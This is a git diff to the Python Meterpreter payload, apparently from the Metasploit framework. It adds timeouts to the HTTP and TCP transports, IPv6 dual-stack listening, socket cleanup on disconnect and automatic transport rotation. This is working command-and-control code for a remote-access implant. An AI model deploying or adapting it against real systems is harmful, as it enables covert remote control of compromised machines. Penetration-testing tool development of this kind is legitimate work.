diff --git a/data/meterpreter/meterpreter.py b/data/meterpreter/meterpreter.py index a60b6150ae..b9ac4ebafc 100644 --- a/data/meterpreter/meterpreter.py +++ b/data/meterpreter/meterpreter.py @@ -488,7 +488,7 @@ class HttpTransport(Transport): def _get_packet(self): packet = None request = urllib.Request(self.url, bytes('RECV', 'UTF-8'), self._http_request_headers) - url_h = urllib.urlopen(request) + url_h = urllib.urlopen(request, timeout=self.communication_timeout) packet = url_h.read() if packet: if packet[8:] == STAGE_START_MARKER: @@ -500,7 +500,7 @@ class HttpTransport(Transport): def _send_packet(self, packet): request = urllib.Request(self.url, packet, self._http_request_headers) - url_h = urllib.urlopen(request) + url_h = urllib.urlopen(request, timeout=self.communication_timeout) response = url_h.read() def tlv_pack_transport_group(self): @@ -516,6 +516,17 @@ class TcpTransport(Transport): super(TcpTransport, self).__init__() self.url = url self.socket = socket + self._cleanup_thread = None + + def _sock_cleanup(self, sock): + remaining_time = self.communication_timeout + while remaining_time > 0: + iter_start_time = time.time() + if select.select([sock], [], [], remaining_time)[0]: + if len(sock.recv(4096)) == 0: + break + remaining_time -= time.time() - iter_start_time + sock.close() def activate(self): if self.socket: @@ -527,12 +538,20 @@ class TcpTransport(Transport): family = socket.AF_INET6 address, port = self.url[7:].split(':', 1) port = int(port.rstrip('/')) - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - if address == '0.0.0.0' or address == '::': - sock.bind((address, port)) - sock.listen(1) - sock, _ = sock.accept() + if address in ('', '0.0.0.0', '::'): + try: + server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM) + server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0) + except (AttributeError, socket.error): + server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) + server_sock.bind(('', port)) + server_sock.listen(1) + if not select.select([server_sock], [], [], self.communication_timeout)[0]: + raise RuntimeError('connection timed out') + sock, _ = server_sock.accept() + server_sock.close() else: + sock = socket.socket(family, socket.SOCK_STREAM) sock.connect((address, port)) self.socket = sock return @@ -540,8 +559,8 @@ class TcpTransport(Transport): def deactivate(self): if not self.socket: return - self.socket.shutdown(socket.SHUT_RDWR) - self.socket.close() + cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,)) + cleanup.run() self.socket = None def _get_packet(self): @@ -638,9 +657,11 @@ class PythonMeterpreter(object): def session_has_expired(self): return time.time() > self.session_expiry_end - def transport_change(self, new_transport): + def transport_change(self, new_transport=None): if new_transport == self.transport: return + if new_transport is None: + new_transport = self.transport_next() self.transport.deactivate() new_transport.activate() self.transport = new_transport @@ -800,6 +821,7 @@ class PythonMeterpreter(object): def _core_transport_change(self, request, response): new_transport = Transport.from_request(request) + self.transports.append(new_transport) self.send_packet(tlv_pack_response(ERROR_SUCCESS, response)) self.transport_change(new_transport) return None